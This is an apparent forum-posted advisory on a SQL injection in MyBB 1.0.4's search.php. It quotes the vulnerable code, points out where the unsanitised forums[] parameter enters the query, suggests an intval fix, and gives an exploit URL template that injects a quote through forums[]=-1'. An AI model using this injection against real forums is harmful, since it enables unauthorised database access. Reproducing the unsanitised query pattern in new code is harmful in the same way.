MyBB 1.0.4 New SQL Injection

D3vil-0x1

File :- search.php

580 to 592

/* _START_ */

if($mybb->input['forums'] != "all")

{

if(!is_array($mybb->input['forums'])) <<-- We Break It By forums[]=-1

{

$mybb->input['forums'] = array(intval($mybb->input['forums']));

}

foreach($mybb->input['forums'] as $forum)

{

if(!$searchin[$forum])

{

$query = $db->query("SELECT f.fid FROM ".TABLE_PREFIX."forums f LEFT JOIN ".TABLE_PREFIX."forumpermissions p ON (f.fid=p.fid AND p.gid='".$mybb->user[usergroup]."') WHERE INSTR(CONCAT(',',parentlist,','),',$forum,') > 0 AND active!='no' AND (ISNULL(p.fid) OR p.cansearch='yes')");

if($db->num_rows($query) == 1)

{

$wheresql .= " AND t.fid='$forum' "; <<-- First SQL Injection

$searchin[$fid] = 1;

}

Fix it :-

Add :-

$forum = intval($forum); To Line 568

/* _END_*/

/* Exploit */

[username] = any username in victem forum

[HOST]/[PATH]/search.php?action=do_search&postthread=1&author=[username]
&matchusername=1&forums[]=-1'

[ reply ]